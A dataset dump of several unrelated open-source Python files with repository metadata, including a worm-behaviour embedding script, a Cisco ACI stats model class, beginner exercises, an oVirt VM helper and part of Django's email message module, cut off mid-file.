e721b0da6badeaacbd866a2f0a8a7aaba7ede2c4 | 773300eda3f26141a8cbf8259688c15978e5fdff | /collect_data/collect_emb_AE.py | 8e26b6ed01d859faeec1ac580d59e392170302bb | []
| no_license | ver228/worm-ts-classification | 96601c0f579a4d8f110cb6307ff59f8eb7620657 | 6d4d6b6f04e05a93baea7a5a7550a7a180b60c94 | refs/heads/master | 2021-10-28T15:28:27.098510 | 2019-04-24T07:36:35 | 2019-04-24T07:36:35 | 179,681,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 15 13:04:37 2018
@author: avelinojaver
"""
from pathlib import Path
import sys
src_d = Path(__file__).resolve().parents[1]
sys.path.append(str(src_d))
from worm_ts_classification.path import _root_dirs
from embeddings_helper import calculate_embeddings
from collect_emb_CeNDR import get_video_info_from_files
import pandas as pd
import os
def get_video_info_from_csv_agg(root_dir):
    """Load the aggregation-screening metadata and pair it with feature files.

    root_dir : root directory containing the MaskedVideos tree.

    Returns (video_info, fnames): the metadata table restricted to rows whose
    *_featuresN.hdf5 file exists on disk, and the matching list of
    pathlib.Path objects (same order as the surviving rows).
    """
    csv_path = str(Path.home() / 'workspace/WormData/screenings/Serena_WT_Screening/metadata_aggregation_screening.csv')
    bad_labels = ['NONE']

    video_info = pd.read_csv(csv_path)
    # Strip the archive mount prefix.  Fix: the original used '\$' in a plain
    # string (an invalid escape sequence) and relied on pandas' old
    # regex=True default, which changed to regex=False in pandas 2.0; keep
    # the intended regex semantics explicit with a raw string.
    video_info['dirname'] = video_info['dirname'].str.replace(
        r'/Volumes/behavgenom_archive\$/Serena/AggregationScreening/MaskedVideos/',
        '',
        regex=True)
    video_info = video_info.rename(columns={'strain_name': 'strain', 'dirname': 'file_path'})
    # Drop rows with an unknown strain label.
    video_info = video_info[~video_info['strain'].isin(bad_labels)]

    # Build the expected features file path for every row; the suffix swap is
    # a literal replacement, so pin regex=False explicitly.
    fnames = (root_dir + '/' + video_info['file_path'] + '/'
              + video_info['basename'].str.replace('.hdf5', '_featuresN.hdf5', regex=False))
    # Keep only rows whose features file actually exists.
    is_valid = [os.path.exists(x) for x in fnames.values]
    video_info = video_info[is_valid]
    fnames = [Path(x) for e, x in zip(is_valid, fnames.values) if e]

    return video_info, fnames
#%%
if __name__ == '__main__':
    # Pick the data root for the machine we are running on.
    platform_key = 'osx' if sys.platform == 'darwin' else 'centos_oxford'
    root = _root_dirs[platform_key]

    set_type = 'CeNDR'
    emb_set = 'AE2DWithSkels32_emb32_20180620'
    root_dir = root + 'experiments/autoencoders/embeddings/CeNDR_ROIs_embeddings/20180620_173601_AE2DWithSkels32_skel-1-1_adam_lr0.001_batch16'

    # Collect the per-video embedding files under the autoencoder run dir.
    video_info, fnames = get_video_info_from_files(root_dir, f_ext='_embeddings.hdf5')

    # Aggregate everything into a single classification dataset file.
    save_file = root + 'experiments/classify_strains/{}_{}.hdf5'.format(set_type, emb_set)
    calculate_embeddings(video_info, fnames, emb_set, save_file,
                         col_label='roi_index',
                         embeddings_field='/embeddings')
| [
"[email protected]"
]
| |
9d56718b4ded959a49e3dd8e775bd8bfc29122d7 | aa1e01857c2e02b711e1b748d79016377bcbf3f6 | /6. Chapter Tuples in Python (Immutable)/10_copyingatuples.py | 2e7c5c01186c35e359f73a0e0883fc984ccac6fb | []
| no_license | jaishivnani/Python-Practice-Problems | 3d6b64aca93d28bc479f21845e878b0cc2b037fb | 46d82b276cb46d61cd0acac507cc92b4707e5456 | refs/heads/main | 2023-01-22T23:06:48.309872 | 2020-12-05T14:13:26 | 2020-12-05T14:13:26 | 303,448,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | '''Copying a tuple'''
# tuple1 = (11, 22, 33, 44, 55, 66)
#
#
# tuple2 = tuple1[3:-1]
#
# print(tuple2)
| [
"[email protected]"
]
| |
3f70e4050ad4153565dab180bdd8ab482046c135 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/proc/applicationcpu1h.py | 4d97a761604ed5974688854c702e052311e1b6a7 | []
| no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 11,475 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ApplicationCPU1h(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.proc.ApplicationCPU1h", "Application CPU utilization")
counter = CounterMeta("current", CounterCategory.GAUGE, "percentage", "Application CPU usage")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "currentLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "currentMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "currentMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "currentAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "currentSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "currentTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "currentThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "currentTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "currentTr"
meta._counters.append(counter)
meta.moClassName = "procApplicationCPU1h"
meta.rnFormat = "CDprocApplicationCPU1h"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Application CPU utilization stats in 1 hour"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.proc.App")
meta.parentClasses.add("cobra.model.proc.Container")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.proc.ApplicationCPU")
meta.rnPrefixes = [
('CDprocApplicationCPU1h', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "currentAvg", "currentAvg", 30345, PropCategory.IMPLICIT_AVG)
prop.label = "Application CPU usage average value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentAvg", prop)
prop = PropMeta("str", "currentLast", "currentLast", 30342, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Application CPU usage current value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentLast", prop)
prop = PropMeta("str", "currentMax", "currentMax", 30344, PropCategory.IMPLICIT_MAX)
prop.label = "Application CPU usage maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMax", prop)
prop = PropMeta("str", "currentMin", "currentMin", 30343, PropCategory.IMPLICIT_MIN)
prop.label = "Application CPU usage minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMin", prop)
prop = PropMeta("str", "currentSpct", "currentSpct", 30346, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Application CPU usage suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("currentSpct", prop)
prop = PropMeta("str", "currentThr", "currentThr", 30348, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Application CPU usage thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("currentThr", prop)
prop = PropMeta("str", "currentTr", "currentTr", 30350, PropCategory.IMPLICIT_TREND)
prop.label = "Application CPU usage trend"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTr", prop)
prop = PropMeta("str", "currentTrBase", "currentTrBase", 30349, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Application CPU usage trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTrBase", prop)
prop = PropMeta("str", "currentTtl", "currentTtl", 30347, PropCategory.IMPLICIT_TOTAL)
prop.label = "Application CPU usage total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTtl", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
]
| |
35b0d2a44b219d072fe73f45c05ade42fa4faf2c | 8d9c17a9773fe9e38ba4d3ff65ab3a71360fbc1f | /ch11/ch11.2/questions.py | b13ecee09a854672c4eefa08c3dec2aea3a5cb95 | []
| no_license | kwr0113/Intro_Python | 3529bee454950875fb63ceb99e7f402201091ab6 | 2326d1e2b1f07fac7b3a3054fd13d8ea70d92ba9 | refs/heads/master | 2023-06-09T08:55:02.502842 | 2021-06-25T05:56:16 | 2021-06-25T05:56:16 | 353,600,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py |
from choice import fast, advice
print("Let's go to", fast.pick())
print("Should. we take out?", advice.give()) | [
"[email protected]"
]
| |
042d8b627f884b675c421f5924b25125dbd9ba28 | 344e44fd1caa2976daa11429bf57a949e6b824de | /lesson4/Win_Entry.py | 51ebb606d841eb9531eb9097072c1f528a2afdec | []
| no_license | vincenttuan/ntnu_python | 621bc23c6b7443fde9d9975f6a98226ddec3c42a | e1361518ab69bf8064d38efccb743fcc9b4dd4b5 | refs/heads/master | 2020-12-15T06:23:27.338319 | 2020-02-05T07:37:09 | 2020-02-05T07:37:09 | 234,856,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import random
import tkinter
from tkinter import messagebox
def get():
messagebox.showinfo("Hello Python", entry.get())
def set():
entry.delete(0, tkinter.END)
entry.insert(0, str(random.randint(1, 100)))
win = tkinter.Tk()
entry = tkinter.Entry(win, justify=tkinter.CENTER)
entry.config(font=('Arial', 40))
entry.insert(0, "hello")
entry.insert("end", "world")
entry.insert(5, ", ")
entry.pack()
button1 = tkinter.Button(win, text="Get", command=get)
button1.config(font=('Arial', 30))
button1.pack(side=tkinter.LEFT)
button2 = tkinter.Button(win, text="Set", command=set)
button2.config(font=('Arial', 30))
button2.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"[email protected]"
]
| |
3e58c1bd8bb2ce83eff77c6b6415588b37ace5ee | 161dcb4b1f3939231728e91a8129a2571842d23a | /unit_12/mysite/page/views.py | b717f1ce9a72e4c7c54642a51138da7f81962296 | []
| no_license | bm1120836/21-python | 3162896e1b9e41d57c4249ea5f3bcaf06eef0361 | 8924f9b53e68b08f9203f48b215ea5b3a420d075 | refs/heads/master | 2023-05-03T16:11:42.864607 | 2015-10-01T13:26:29 | 2015-10-01T13:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request,'pages/index.html', {})
def about(request):
mydict = {'title': 'Over and over I keep going over the world we knew'}
return render(request,'pages/about.html', mydict) | [
"[email protected]"
]
| |
2702973ff7a17bed0d48b32a62ace7da4711edf1 | 5f957add3e3f7a1885d4f1b106de72e93c8fcb1a | /ExerciciosPython/ex104.py | 3553a22823ba1a045866075009e6c26bace8337e | [
"MIT"
]
| permissive | mpatrickaires/curso-python | 6e32cf785a3bc0076bb3ea24cd6d896604f4e774 | aba023648527d53bfe18833b91210a7e528a84d7 | refs/heads/main | 2022-12-27T00:57:07.467940 | 2020-10-14T00:48:09 | 2020-10-14T00:48:09 | 302,203,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def leiaInt(msg):
num = str(input(msg))
while not num.strip('-').isnumeric():
print('\033[1;31mERRO! Digite um número válido.\033[m')
num = input(msg)
num = int(num)
return num
# Programa Principal
n = leiaInt('Digite um número: ')
print(f'Você acabou de digitar o número {n}')
| [
"[email protected]"
]
| |
2064b14b6a814eb78b1b5e02c449821f5678c3f3 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/adamant.py | 1fae335b579f8f57ee4132e01c1630fe476896ba | []
| no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for

# Flask blueprint for routes mounted under the /adamant URL prefix.
controller = Blueprint('adamant', __name__, url_prefix='/adamant')

# NOTE: route below is scaffolding left commented out (course exercise).
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
#     if title == 'Republic':  # TODO 2
#         return render_template('republic.html')  # TODO 2
#     else:
#         pass
| [
"[email protected]"
]
| |
e9f664051e1cd44334bed76437d2bc6d1b9406fb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/2c58ac18335d9ccde20b181d76eafa8246a3add2-<get_dict_of_struct>-bug.py | c1b04ce9a26065e77e20d7fb780cf6950f112efa | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,532 | py |
def get_dict_of_struct(connection, vm):
    """Transform an oVirt SDK Vm struct into a plain Python dictionary.

    Returns an empty dict when *vm* is None.  All nested SDK links
    (host, cluster, template, affinity groups, ...) are resolved through
    *connection*, so this performs several API round-trips per VM.
    """
    if (vm is None):
        return dict()
    vms_service = connection.system_service().vms_service()
    clusters_service = connection.system_service().clusters_service()
    vm_service = vms_service.vm_service(vm.id)
    # Per-VM sub-collections fetched from the API:
    devices = vm_service.reported_devices_service().list()
    tags = vm_service.tags_service().list()
    stats = vm_service.statistics_service().list()
    labels = vm_service.affinity_labels_service().list()
    groups = clusters_service.cluster_service(vm.cluster.id).affinity_groups_service().list()
    return {
        'id': vm.id,
        'name': vm.name,
        # vm.host is only populated for running VMs; otherwise report None.
        'host': (connection.follow_link(vm.host).name if vm.host else None),
        'cluster': connection.follow_link(vm.cluster).name,
        'status': str(vm.status),
        'description': vm.description,
        'fqdn': vm.fqdn,
        'os_type': vm.os.type,
        'template': connection.follow_link(vm.template).name,
        'tags': [tag.name for tag in tags],
        'affinity_labels': [label.name for label in labels],
        # NOTE(review): the inner comprehension re-binds the name ``vm``;
        # harmless in Python 3 (comprehension scope) but confusing to read.
        'affinity_groups': [group.name for group in groups if (vm.name in [vm.name for vm in connection.follow_link(group.vms)])],
        'statistics': dict(((stat.name, stat.values[0].datum) for stat in stats)),
        'devices': dict(((device.name, [ip.address for ip in device.ips]) for device in devices)),
        # NOTE(review): presumably devices[0].ips can be empty for NIC-less
        # guests — ips[0] would then raise IndexError; confirm upstream.
        'ansible_host': (devices[0].ips[0].address if (len(devices) > 0) else None),
    }
| [
"[email protected]"
]
| |
ed6013412f56c3d8d36b040db1926b7dbe4df1ac | 48a647031af30b93b332001544b258a787542c6f | /venv/chapter_14/class_3.py | 2436a321ca8a0127db83bc6d111881405f3e1be4 | []
| no_license | Adminsys-debug/xdclass_python | 3d3f37f7812336aa79bf9dc0d990658c67156057 | c2e82b750c5337045b07c19a0c9ead5c3752b3a7 | refs/heads/master | 2022-05-20T07:10:33.396655 | 2020-04-18T05:40:48 | 2020-04-18T05:40:48 | 256,659,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/31 15:34
# @Author : mr.chen
# @File : class_3
# @Software: PyCharm
# @Email : [email protected]
# 多态特性和构造函数
class Person:
    """A person with a name, an age and a height (cm)."""

    def __init__(self, name, age, height):
        # Constructor: announce initialisation, then store the attributes.
        print("这是一个初始化操作")
        self.name = name
        self.age = age
        self.height = height

    def introduce_self(self):
        # Print a short self-introduction built from the stored attributes.
        message = "hello,my name is %s and my age is %d and i.m %d height" % (
            self.name, self.age, self.height)
        print(message)
person = Person("Admin_sys", 27, 172)
person2 = Person("Admin_sys", 28, 173)
person.introduce_self()
person2.introduce_self()
| [
"[email protected]"
]
| |
6dfc0b14ac75334fd342c8fa9823d30c170f81a5 | 30ab9750e6ca334941934d1727c85ad59e6b9c8a | /zentral/contrib/santa/api_urls.py | 93f78fcb7f41f3f7a75739e197ec40139f839f52 | [
"Apache-2.0"
]
| permissive | ankurvaishley/zentral | 57e7961db65278a0e614975e484927f0391eeadd | a54769f18305c3fc71bae678ed823524aaa8bb06 | refs/heads/main | 2023-05-31T02:56:40.309854 | 2021-07-01T07:51:31 | 2021-07-01T14:15:34 | 382,346,360 | 1 | 0 | Apache-2.0 | 2021-07-02T12:55:47 | 2021-07-02T12:55:47 | null | UTF-8 | Python | false | false | 404 | py | from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
from .api_views import IngestFileInfo, RuleSetUpdate
app_name = "santa_api"
urlpatterns = [
url('^ingest/fileinfo/$', IngestFileInfo.as_view(), name="ingest_file_info"),
url('^rulesets/update/$', RuleSetUpdate.as_view(), name="ruleset_update"),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"[email protected]"
]
| |
7981c80ab526d512232ccda263ec7800e95f8da9 | d65128e38be0243f279e0d72ef85e7d3c5e116ca | /base/site-packages/django/core/mail/message.py | a3b36df832c89756073b44e96883bb6bf14c4a1b | [
"Apache-2.0"
]
| permissive | ZxwZero/fastor | 19bfc568f9a68f1447c2e049428330ade02d451d | dd9e299e250362802032d1984801bed249e36d8d | refs/heads/master | 2021-06-26T06:40:38.555211 | 2021-06-09T02:05:38 | 2021-06-09T02:05:38 | 229,753,500 | 1 | 1 | Apache-2.0 | 2019-12-23T12:59:25 | 2019-12-23T12:59:24 | null | UTF-8 | Python | false | false | 13,545 | py | from __future__ import unicode_literals
import mimetypes
import os
import random
import sys
import time
from email import charset as Charset, encoders as Encoders
from email.generator import Generator
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.header import Header
from email.utils import formatdate, getaddresses, formataddr, parseaddr
from django.conf import settings
from django.core.mail.utils import DNS_NAME
from django.utils.encoding import force_text
from django.utils import six
# Don't BASE64-encode UTF-8 messages so that we avoid unwanted attention from
# some spam filters.
Charset.add_charset('utf-8', Charset.SHORTEST, None, 'utf-8')
# Default MIME type to use on attachments (if it is not explicitly given
# and cannot be guessed).
DEFAULT_ATTACHMENT_MIME_TYPE = 'application/octet-stream'
class BadHeaderError(ValueError):
    """Raised when a mail header value contains newline characters
    (guards against header-injection attacks)."""
    pass
# Copied from Python standard library, with the following modifications:
# * Used cached hostname for performance.
# * Added try/except to support lack of getpid() in Jython (#5496).
def make_msgid(idstring=None):
    """Build an RFC 2822 compliant Message-ID string, e.g.:

    <20090519231631.520.5723.myid@hostname>

    The optional *idstring*, when given, is appended to strengthen the
    uniqueness of the generated id.
    """
    utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(time.time()))
    try:
        pid = os.getpid()
    except AttributeError:
        # Some platforms (e.g. Jython) have no getpid().
        pid = 1
    randint = random.randrange(100000)
    suffix = '' if idstring is None else '.' + idstring
    # DNS_NAME is the cached local hostname (django.core.mail.utils).
    return '<%s.%s.%s%s@%s>' % (utcdate, pid, randint, suffix, DNS_NAME)
# Header names that contain structured address data (RFC #5322)
ADDRESS_HEADERS = set([
'from',
'sender',
'reply-to',
'to',
'cc',
'bcc',
'resent-from',
'resent-sender',
'resent-to',
'resent-cc',
'resent-bcc',
])
def forbid_multi_line_headers(name, val, encoding):
    """Forbids multi-line headers, to prevent header injection.

    Returns a (name, encoded_value) pair safe to assign to a MIME message.
    """
    encoding = encoding or settings.DEFAULT_CHARSET
    val = force_text(val)
    if '\n' in val or '\r' in val:
        raise BadHeaderError("Header values can't contain newlines (got %r for header %r)" % (val, name))
    try:
        val.encode('ascii')
    except UnicodeEncodeError:
        # Non-ASCII value: address headers must keep the address part intact,
        # so each address is sanitized individually; all other headers are
        # MIME-encoded wholesale via email.header.Header.
        if name.lower() in ADDRESS_HEADERS:
            val = ', '.join(sanitize_address(addr, encoding)
                for addr in getaddresses((val,)))
        else:
            val = Header(val, encoding).encode()
    else:
        # Pure-ASCII subjects still go through Header() to get RFC 2822
        # line folding for long values.
        if name.lower() == 'subject':
            val = Header(val).encode()
    return str(name), val
def sanitize_address(addr, encoding):
    """Encode a single address for use in a mail header.

    *addr* may be a raw string or a (display-name, address) pair.  The
    display name is MIME-encoded; a non-ASCII domain is IDNA-encoded.
    """
    if isinstance(addr, six.string_types):
        addr = parseaddr(force_text(addr))
    nm, addr = addr
    # This try-except clause is needed on Python 3 < 3.2.4
    # http://bugs.python.org/issue14291
    try:
        nm = Header(nm, encoding).encode()
    except UnicodeEncodeError:
        nm = Header(nm, 'utf-8').encode()
    try:
        addr.encode('ascii')
    except UnicodeEncodeError: # IDN
        # Non-ASCII address: encode the local part with the requested
        # charset and the domain with IDNA (RFC 3490).
        if '@' in addr:
            localpart, domain = addr.split('@', 1)
            localpart = str(Header(localpart, encoding))
            domain = domain.encode('idna').decode('ascii')
            addr = '@'.join([localpart, domain])
        else:
            addr = Header(addr, encoding).encode()
    return formataddr((nm, addr))
class SafeMIMEText(MIMEText):
    """MIMEText that routes every header assignment through the
    header-injection guard (forbid_multi_line_headers)."""
    def __init__(self, text, subtype, charset):
        self.encoding = charset
        MIMEText.__init__(self, text, subtype, charset)
    def __setitem__(self, name, val):
        # All header writes are validated/encoded before being stored.
        name, val = forbid_multi_line_headers(name, val, self.encoding)
        MIMEText.__setitem__(self, name, val)
    def as_string(self, unixfrom=False):
        """Return the entire formatted message as a string.
        Optional `unixfrom' when True, means include the Unix From_ envelope
        header.
        This overrides the default as_string() implementation to not mangle
        lines that begin with 'From '. See bug #13433 for details.
        """
        fp = six.StringIO()
        g = Generator(fp, mangle_from_ = False)
        if sys.version_info < (2, 6, 6) and isinstance(self._payload, six.text_type):
            # Workaround for http://bugs.python.org/issue1368247
            self._payload = self._payload.encode(self._charset.output_charset)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()
class SafeMIMEMultipart(MIMEMultipart):
    """MIMEMultipart that routes every header assignment through the
    header-injection guard (forbid_multi_line_headers)."""
    def __init__(self, _subtype='mixed', boundary=None, _subparts=None, encoding=None, **_params):
        self.encoding = encoding
        MIMEMultipart.__init__(self, _subtype, boundary, _subparts, **_params)
    def __setitem__(self, name, val):
        # All header writes are validated/encoded before being stored.
        name, val = forbid_multi_line_headers(name, val, self.encoding)
        MIMEMultipart.__setitem__(self, name, val)
    def as_string(self, unixfrom=False):
        """Return the entire formatted message as a string.
        Optional `unixfrom' when True, means include the Unix From_ envelope
        header.
        This overrides the default as_string() implementation to not mangle
        lines that begin with 'From '. See bug #13433 for details.
        """
        fp = six.StringIO()
        g = Generator(fp, mangle_from_ = False)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()
class EmailMessage(object):
    """
    A container for email information.

    Collects subject/body/recipients/attachments and builds a MIME
    message on demand via message(); send() delivers it through the
    configured email backend connection.
    """
    content_subtype = 'plain'
    mixed_subtype = 'mixed'
    encoding = None  # None => use settings default

    def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
                 connection=None, attachments=None, headers=None, cc=None):
        """
        Initialize a single email message (which can be sent to multiple
        recipients).

